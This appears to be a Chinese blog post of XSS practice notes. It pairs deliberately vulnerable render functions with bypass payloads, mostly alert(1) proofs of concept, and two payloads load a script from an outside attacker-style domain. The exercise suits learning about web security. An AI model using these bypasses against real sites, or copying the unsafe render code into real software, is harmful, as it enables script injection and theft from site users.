xss学习1

__小葵__
567 阅读1分钟 
function render (input) {
  return '<div>' + input + '</div>'
}
//input code
<script>alert(1)</script>

function render (input) {
  return '<textarea>' + input + '</textarea>'
}
//input code
</textarea><script>alert(1)</script>

function render (input) {
  return '<input type="name" value="' + input + '">'
}
//input code
"><script>alert(1)</script>

function render (input) {
  const stripBracketsRe = /[()]/g
  input = input.replace(stripBracketsRe, '')
  return input
}
//input code
<script>alert`1`</script>

function render (input) {
  const stripBracketsRe = /[()`]/g
  input = input.replace(stripBracketsRe, '')
  return input
}
//input code
<svg><script>alert&#40;1&#41;</script

function render (input) {
  input = input.replace(/-->/g, '😂')
  return '<!-- ' + input + ' -->'
}
//input code 
--!> <script>alert(1)</script>

function render (input) {
  input = input.replace(/auto|on.*=|>/ig, '_')
  return `<input value=1 ${input} type="text">`
}
//input code
type=image   
onerror
=alert(1) src


function render (input) {
  const stripTagsRe = /<\/?[^>]+>/gi

  input = input.replace(stripTagsRe, '')
  return `<article>${input}</article>`
}
//input code
<svg onload=alert(1)

function render (src) {
  src = src.replace(/<\/style>/ig, '/* \u574F\u4EBA */')
  return `
    <style>
      ${src}
    </style>
  `
}
//input code
</style ><script>alert(1)</script>

function render (input) {
  let domainRe = /^https?:\/\/www\.segmentfault\.com/
  if (domainRe.test(input)) {
    return `<script src="${input}"></script>`
  }
  return 'Invalid URL'
}
//input code
http://www.segmentfault.com.xss.com/j.js


function render (input) {
  input = input.toUpperCase()
  return `<h1>${input}</h1>`
}


function render (input) {
  input = input.replace(/script/ig, '')
  input = input.toUpperCase()
  return '<h1>' + input + '</h1>'
}
//input code
<scrscriptipt src="http://www.segmentfault.com.xss.com/j.js"></scscriptript>

function render (input) {
  function escapeHtml(s) {
    return s.replace(/&/g, '&amp;')
            .replace(/'/g, '&#39;')
            .replace(/"/g, '&quot;')
            .replace(/</g, '&lt;')
            .replace(/>/g, '&gt;')
            .replace(/\//g, '&#x2f;')
  }
  return `<img src onerror="console.error('${escapeHtml(input)}')">`
}

//input code
');alert('1

function render (input) {
  return `
<script>
  window.data = ${input}
</script>
  `
}
//input code
alert(1)
avatar
文章
阅读
粉丝